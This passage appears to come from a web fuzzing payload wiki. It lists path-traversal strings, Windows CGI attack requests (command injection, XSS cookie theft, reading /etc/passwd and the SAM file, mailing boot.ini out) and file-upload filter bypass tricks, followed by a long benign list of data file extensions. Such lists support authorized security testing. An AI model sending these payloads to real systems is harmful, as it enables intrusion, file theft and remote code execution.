./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010)&lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass (Update: 17 March 2010 - notes only) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - Generic (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - PHP Specific (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar &lt;br /&gt;
# PHP on Windows&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - Microsoft Specific (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== PHP-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# PHP-Specific File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
{PHPSCRIPT}.php.doc&lt;br /&gt;
{PHPSCRIPT}.php.xls&lt;br /&gt;
{PHPSCRIPT}.php.xlsx&lt;br /&gt;
{PHPSCRIPT}.php.pdf&lt;br /&gt;
{PHPSCRIPT}.php.jpeg&lt;br /&gt;
{PHPSCRIPT}.php.gif&lt;br /&gt;
{PHPSCRIPT}.php.zip&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends  (Update: 17 March 2010) &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
